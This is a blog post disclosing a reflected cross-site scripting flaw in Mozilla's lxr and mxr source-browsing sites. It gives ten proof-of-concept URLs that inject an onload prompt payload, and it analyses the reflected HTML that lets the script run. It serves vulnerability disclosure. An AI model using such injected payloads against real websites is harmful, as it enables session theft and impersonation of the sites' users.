Domains:
http://lxr.mozilla.org/
http://mxr.mozilla.org/
(The two domains above are almost the same)
Websites information:
"lxr.mozilla.org, mxr.mozilla.org are
cross references designed to display the Mozilla source code. The
sources displayed are those that are currently checked in to the
mainline of the mozilla.org CVS server, Mercurial Server, and Subversion
Server; these pages are updated many times a day, so they should be
pretty close to the latest‑and‑greatest." (from Mozilla)
"Mozilla
is a free-software community which produces the Firefox web browser.
The Mozilla community uses, develops, spreads and supports Mozilla
products, thereby promoting exclusively free software and open
standards, with only minor exceptions. The community is supported
institutionally by the Mozilla Foundation and its tax-paying subsidiary,
the Mozilla Corporation. In addition to the Firefox browser, Mozilla
also produces Thunderbird, Firefox Mobile, the Firefox OS mobile
operating system, the bug tracking system Bugzilla and a number of other
projects." (Wikipedia)
(1) Vulnerability description:
Mozilla
website has a computer cyber security problem. Hacker can attack it by
XSS bugs. Here is the description of XSS: "Hackers are constantly
experimenting with a wide repertoire of hacking techniques to compromise
websites and web applications and make off with a treasure trove of
sensitive data including credit card numbers, social security numbers
and even medical records. Cross-site Scripting (also known as XSS or
CSS) is generally believed to be one of the most common application
layer hacking techniques Cross-site Scripting allows an attacker to
embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a
vulnerable dynamic page to fool the user, executing the script on his
machine in order to gather data. The use of XSS might compromise private
information, manipulate or steal cookies, create requests that can be
mistaken for those of a valid user, or execute malicious code on the
end-user systems. The data is usually formatted as a hyperlink
containing malicious content and which is distributed over any possible
means on the internet." (Acunetix)
All pages under the following two URLs are vulnerable.
http://lxr.mozilla.org/mozilla-central/source
http://mxr.mozilla.org/mozilla-central/source
This means all URLs under the above two domains can be used for XSS attacks targeting Mozilla's users.
Since
there are large number of pages under them. Meanwhile, the contents of
the two domains vary. This makes the vulnerability very dangerous.
Attackers can use different URLs to design XSS attacks to Mozilla's
variety class of users.
POC Codes:
http://lxr.mozilla.org/mozilla-central/source/<body onload=prompt("justqdjing")>
http://lxr.mozilla.org/mozilla-central/source/mobile/android/<body onload=prompt("justqdjing")>
http://lxr.mozilla.org/mozilla-central/source/Android.mk/<body onload=prompt("tetraph")>
http://lxr.mozilla.org/mozilla-central/source/storage/public/mozIStorageBindingParamsArray.idl/<body onload=prompt("tetraph")>
http://lxr.mozilla.org/mozilla-central/source/netwerk/protocol/device/AndroidCaptureProvider.cpp<body onload=prompt("tetraph")>
http://mxr.mozilla.org/mozilla-central/source/<body onload=prompt("justqdjing")>
http://mxr.mozilla.org/mozilla-central/source/webapprt/<body onload=prompt("justqdjing")>
http://mxr.mozilla.org/mozilla-central/source/mozilla-config.h.in/<body onload=prompt("justqdjing")>
http://mxr.mozilla.org/mozilla-central/source/chrome/nsChromeProtocolHandler.h/<body onload=prompt("tetraph")>
http://mxr.mozilla.org/mozilla-central/source/security/sandbox/linux/x86_32_linux_syscalls.h/<body onload=prompt("tetraph")>
POC Video:
(2) Vulnerability Analysis:
Take the following link as an example,
http://lxr.mozilla.org/mozilla-central/source/chrome/<attacktest>
In the page reflected, it contains the following codes.
<a href="/mozilla-central/source/chrome/%253Cattacktest%253E">
<attacktest></attacktest>
</a>
If insert "<body onload=prompt("justqdjing")>" into the URL, the code can be executed.
The
vulnerability can be attacked without user login. Tests were performed
on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.
(3) Vulnerability Disclosure:
The vulnerability have been reported to bugzilla.mozilla.org. Mozilla are dealing with this issue.
Discovered and Reported by:
Wang
Jing, Division of Mathematical Sciences (MAS), School of Physical and
Mathematical Sciences (SPMS), Nanyang Technological University (NTU),
Singapore. (@justqdjing)
More Details:
http://tetraph.blog.163.com/blog/static/2346030512014101115642885/
http://computerobsess.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html
http://computerobsess.blogspot.com/2014/10/mozilla-mozillaorg-two-sub-domains.html
No comments:
Post a Comment